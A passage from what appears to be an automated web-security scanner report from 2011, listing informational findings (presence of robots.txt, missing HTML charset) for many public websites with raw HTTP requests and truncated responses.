Last-Modified: Wed, 14 May 2008 06:29:11 GMT
ETag: "3e781bc-35-e615dbc0"
Accept-Ranges: bytes
Content-Length: 53
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /hosting/
Disallow: /bbt/

24.950. http://www.yuku.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yuku.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.yuku.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:36:39 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Tue, 07 Dec 2010 14:21:19 GMT
ETag: "810cab-48-496d2b7df35c0"
Accept-Ranges: bytes
Content-Length: 72
Cache-Control: max-age=7776000
Expires: Fri, 01 Jul 2011 13:36:39 GMT
Vary: Accept-Encoding
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"

User-agent: MJ12bot
Disallow: /
User-agent:    *
Crawl-delay: 10
Disallow:

24.951. http://www.zabasearch.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zabasearch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zabasearch.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:40 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 13 Oct 2008 23:25:58 GMT
ETag: "80680-2d9-d243cd80"
Accept-Ranges: bytes
Content-Length: 729
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt for http://www.zabasearch.com/

User-agent: *
# files at root
Disallow: /query1_zaba.php
Disallow: /query1_yahoo.php
Disallow: /query1_anywho.php
Disallow: /query1_referral.php
Disallow:
...[SNIP]...

24.952. http://www.zap2it.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zap2it.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zap2it.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 123
Content-Type: text/plain
Last-Modified: Wed, 30 Jul 2008 02:03:51 GMT
ETag: "7b-488fcc07"
Cache-Control: private, max-age=49
Date: Sat, 02 Apr 2011 13:37:21 GMT
Content-Length: 123
Connection: close

User-agent: *
Disallow: /stylesheets
Disallow: /javascript
Disallow: /event.ng/
Sitemap: http://www.zap2it.com/sitemap.xml

24.953. http://www.zappos.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zappos.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zappos.com

Response

HTTP/1.0 200 OK
Server: nginx/0.9.4
Content-Type: text/plain
Cteonnt-Length: 759
Last-Modified: Wed, 02 Feb 2011 03:43:44 GMT
X-Core-Value: 1. Deliver WOW Through Service
X-Recruiting: If you're reading this, maybe you should be working at Zappos instead. Check out jobs.zappos.com
Cache-Control: private, max-age=0
Date: Sat, 02 Apr 2011 13:31:02 GMT
Content-Length: 759
Connection: close

User-agent: *
Disallow: /r/
Disallow: /bin/
Disallow: /n/howtophone.cgi
Disallow: /n/multi_view.cgi
Disallow: /n/redirect.cgi
Disallow: /noauth/redirect.cgi
Disallow: /n/sc
Disallow: /multiview
Disall
...[SNIP]...

24.954. http://www.zazzle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zazzle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zazzle.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Type: text/plain
Last-Modified: Mon, 08 Nov 2010 08:27:51 GMT
Accept-Ranges: bytes
ETag: "6c050d51e7fcb1:0"
Server: Microsoft-IIS/7.5
Date: Sat, 02 Apr 2011 13:35:15 GMT
Connection: keep-alive
Content-Length: 624

User-agent: *
Disallow: /.components/
Disallow: /.controls/
Disallow: /.emails/
Disallow: /.masterpages/
Disallow: /.templates/
Disallow: /_internal/
Disallow: /_scripts/
Disallow: /_tests/
D
...[SNIP]...

24.955. http://www.zillow.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zillow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zillow.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:35 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
Cache-Control: max-age=1209600
Expires: Sat, 16 Apr 2011 13:36:35 GMT
ETag: W/"771-1277524721000"
Last-Modified: Sat, 26 Jun 2010 03:58:41 GMT
Content-Type: text/plain
Content-Length: 771
Set-Cookie: BIGipServertomcat_pool_0=3456895498.0.0000; path=/
Via: 1.0 www.zillow.com
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=2, max=14
Connection: close
Set-Cookie: BIGipServerapache_pool_0=2534148618.0.0000; path=/

# Access to and use of Zillow.com is governed by our Terms of Use. See http://www.zillow.com/corp/Terms.htm

User-agent: *
Disallow: /claiming/
Disallow: /contact/
Disallow: /corp/Terms.htm
Disallow:
...[SNIP]...

24.956. http://www.zimbio.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zimbio.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zimbio.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Sat, 02 Apr 2011 13:24:00 GMT
Content-Type: text/plain
Connection: close
Expires: Sat, 02 Apr 2011 13:34:00 GMT
Vary: Cookie
Last-Modified: Sat, 02 Apr 2011 13:16:15 GMT
Cache-Control: max-age=600

User-agent: *
Disallow: /member/sushil345/
Disallow: /*/polls/random$
Disallow: /search?
Disallow: /*/news/
Disallow: /*/news?
Disallow: /*/news$
Disallow: /*/history/
Disallow: /*/history?
Disallow:
...[SNIP]...

24.957. http://www.ziprealty.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ziprealty.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ziprealty.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Mar 2011 05:05:14 GMT
ntCoent-Length: 893
Content-Type: text/plain
Cache-Control: private, max-age=86400
Date: Sat, 02 Apr 2011 13:53:11 GMT
Content-Length: 893
Connection: close

User-agent: *

Disallow: /registration/
Disallow: /account/
Disallow: /login/
Disallow: /images/
Disallow: /images_personnel/
Disallow: /images_mls/
Disallow: /js/
Disallow: /admin/
Disallow: /css/
Di
...[SNIP]...

24.958. http://www.zmags.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zmags.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zmags.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Mar 2011 13:15:31 GMT
ETag: "4000134-663-49f3a4592a2c0"
Accept-Ranges: bytes
Content-Length: 1635
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=6977
Expires: Sat, 02 Apr 2011 15:59:42 GMT
Date: Sat, 02 Apr 2011 14:03:25 GMT
Connection: close

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

24.959. http://www.zoosk.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zoosk.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zoosk.com

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:40:04 GMT
Keep-Alive: timeout=10, max=997
Accept-Ranges: bytes
ETag: "207823b-4c2-49fe071f1b800"
Connection: close
Last-Modified: Fri, 01 Apr 2011 19:30:40 GMT
Content-Length: 1218

#
# Well I've got news for you. You are mine now! You belong to me!
#

User-Agent: *
Disallow: /logout.php*
Disallow: /ajax/
Disallow: /blocked.php
Disallow: /blocked.php*
Disallow: /signup.php*
Disal
...[SNIP]...

24.960. http://www.zshare.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zshare.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zshare.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
ETag: "1076618988"
Accept-Ranges: bytes
Last-Modified: Thu, 05 Aug 2010 08:04:49 GMT
Content-Length: 166
Connection: close
Date: Sat, 02 Apr 2011 14:00:58 GMT
Server: lighttpd/1.5.0

User-Agent: *
Disallow: /download/
Disallow: /abuse.html
Disallow: /delete.html

User-Agent: MediaPartners-Google
Allow: /

User-agent: Browsershots
Allow: /

24.961. http://www.zvents.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zvents.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 02 Apr 2011 13:43:44 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-Runtime: 5
ETag: "43a325d9ba9f2deac2638cedc6222807"
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 546
Set-Cookie: _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlZmUxMDk1OGNlYjdjZDA2NjU2NTc0MzFmYTZlMzFkNDA%3D--4eaf7ac3d6bc616a4d456b7e159c86b1cc89bb8e; path=/; expires=Sat, 02-Jul-2011 13:43:44 GMT; HttpOnly

User-agent: *
Disallow: /javascripts
Disallow: /rss
Disallow: /rss*
Disallow: /ical
Disallow: /ical*
Disallow: /json
Disallow: /json*
Disallow: /partners
Disallow: /partners*
Disallow: /user/
Disallow
...[SNIP]...

24.962. http://www.zynga.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zynga.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zynga.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:44:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 17 Sep 2010 16:52:50 GMT
ETag: "18192b7-24-4907764977c80"
Accept-Ranges: bytes
Content-Length: 36
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: ia_archiver
Disallow: /

25. HTML does not specify charset
There are 44 instances of this issue:


25.1. https://activresa-secure2.icor.fr/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://activresa-secure2.icor.fr
Path:   /

Request

GET / HTTP/1.1
Host: activresa-secure2.icor.fr
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Content-Length: 261
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:48:16 GMT

<html><head><title>Error</title></head><body><head><title>Affichage du contenu du r.pertoire refus.</title></head>
<body><h1>Affichage du contenu du r.pertoire refus.</h1>L'affichage du contenu n'est
...[SNIP]...

25.2. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7149
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 02 Apr 2011 12:56:48 GMT
Expires: Sat, 02 Apr 2011 12:56:48 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

25.3. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=2178764;type=newkc987;cat=kcomh345;ord=1;num=2714251752477.139? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; BE_CLA=p_id%3D2L8PRN68LAAPR28ANNL404NJ22AH628422%26p_last_ref%3Dhttp%253A//quickbooksonline.intuit.com/bookkeeping-accounting-systems/%253Fsc%253DQBC-V51-SUF-HMEPGE%26s_entry%3Dhttp%253A//fls.doubleclick.net/activityi%253Bsrc%253D1996823%253Btype%253Dfmsco864%253Bcat%253Dqbosi086%253Bord%253D1%253Bnum%253D7793246807996.184%253F%26p_first_ref%3Dhttp%253A//quickbooksonline.intuit.com/bookkeeping-accounting-systems/%253Fsc%253DQBC-V51-SUF-HMEPGE%26p_first_entry%3Dhttp%253A//fls.doubleclick.net/activityi%253Bsrc%253D1996823%253Btype%253Dfmsco864%253Bcat%253Dqbosi086%253Bord%253D1%253Bnum%253D7793246807996.184%253F%26s_expire%3D1300726794236%26s_id%3DJL8PRN68LAAPRJP844P404NJ22AH628422; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sat, 02 Apr 2011 13:57:06 GMT
Expires: Sat, 02 Apr 2011 13:57:06 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 1088

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Start of Standa
...[SNIP]...

25.4. http://www.avast.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.avast.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.avast.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "544016114"
Last-Modified: Wed, 05 May 2010 08:20:54 GMT
Content-Length: 2550
Date: Sat, 02 Apr 2011 13:38:01 GMT
Server: httpd

..............h...&......... .h.......(....... ............................................ ...(...*....... ..."...$...+..."...%...&...(...)...-...>...C..8O..;W..=X..\o...0...;...?...>..    F...H...[...S
...[SNIP]...

25.5. http://www.billsnitzer.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.billsnitzer.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.billsnitzer.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 02 Apr 2011 14:18:51 GMT
Server: lighttpd/1.4.28

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

25.6. http://www.cheetahmail.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheetahmail.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cheetahmail.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 10:50:17 GMT
Server: Apache
Last-Modified: Thu, 23 Feb 2006 19:03:21 GMT
ETag: "cb357-21c5-43fe06f9"
Accept-Ranges: bytes
Content-Length: 8645
Content-Type: text/html

<html><head><title>CheetahMail - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="https://f.chtah.com/s/0/0/shared.css">
<body bgcolor="#ffffff" marginheight="0" margin
...[SNIP]...

25.7. http://www.chinaontv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chinaontv.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chinaontv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.46
Date: Sat, 02 Apr 2011 07:50:55 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.46</center>
</body>
</html>

25.8. http://www.citibank.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citibank.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.citibank.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not found
Server: ""
Date: Sat, 02 Apr 2011 13:35:26 GMT
Content-type: text/html
Connection: close
Content-Length: 14811

<HTML>
<HEAD>
   <style>
   <!--
       body {
           background: #fff;
       }
       .notextdecor{
           COLOR: #000099;
           TEXT-DECORATION: none;
       }
       TD{
           COLOR: #000000;
           FONT-FAMILY: verdana, arial, helvetica, sans
...[SNIP]...

25.9. http://www.cobaltnitra.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cobaltnitra.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cobaltnitra.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:56:35 GMT
Content-Length: 1214
Content-Type: text/html
X-Cache: MISS from backend02-1
X-Cache-Lookup: HIT from backend02-1:4001
Age: 260
X-Cache: HIT from frontend02
X-Cache-Lookup: HIT from frontend02:3128
Via: 1.0 backend02-1 (squid), 1.0 frontend02 (squid)
Proxy-Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...

25.10. http://www.coolmath.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolmath.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.coolmath.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:33:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 06 Feb 2010 01:52:56 GMT
ETag: "36680b6-3be-d3afce00"
Accept-Ranges: bytes
Content-Length: 958
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at coolmath.com
</ADDRESS>
</BODY>
</HTM
...[SNIP]...

25.11. http://www.coolmath4kids.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolmath4kids.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.coolmath4kids.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:49 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 08 Feb 2010 23:13:04 GMT
ETag: "2c38487-3c3-f17ba000"
Accept-Ranges: bytes
Content-Length: 963
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at coolmath4kids.com
</ADDRESS>
</BODY>

...[SNIP]...

25.12. http://www.crocoads.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crocoads.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.crocoads.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 02 Apr 2011 13:58:52 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

25.13. http://www.drudgereport.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drudgereport.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.drudgereport.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 01 Apr 2011 22:42:24 GMT
Server: ch-sc-dr5

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

25.14. http://www.dt00.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dt00.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dt00.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 14:00:05 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Keep-Alive: timeout=20

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.54</center>
</body>
</html>

25.15. http://www.ehow.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ehow.co.uk
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ehow.co.uk
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 1150
Content-Type: text/html
Set-Cookie: v=NEW; expires=Mon, 02 May 2011 14:00:19 GMT; path=/; domain=www.ehow.co.uk;
ETag: "6ed485fcdbc3fdf6d0a3a393e95f5a88:1300482785"
Cache-Control: max-age=40957
Date: Sat, 02 Apr 2011 14:00:19 GMT
Connection: close

............ .h.......(....... ..... .....@......................................s...........................c...........................,...........................................................,..
...[SNIP]...

25.16. http://www.elyricsworld.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 20:22:02 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1321
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{
   font-size: 12px;
   color: #000000;
   font-f
...[SNIP]...

25.17. http://www.epinions.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epinions.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.epinions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:50 GMT
Server: Apache/2.2.14 (Unix) PHP/4.4.9
Cache-control: private
Set-Cookie: EPV_PgVwID=e060b1a6c3caf55e5af3d016; path=/; domain=.epinions.com;
Content-Length: 2494
Content-Type: text/html

...... ..............(... ...@...................................@............ ..@ ... ... ...@..@@...@...@...`..@`...`...`......@...............@...............@...............@............. .@. ...
...[SNIP]...

25.18. http://www.fark.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fark.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fark.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Server: nginx
Date: Sat, 02 Apr 2011 13:56:18 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 162

<html>
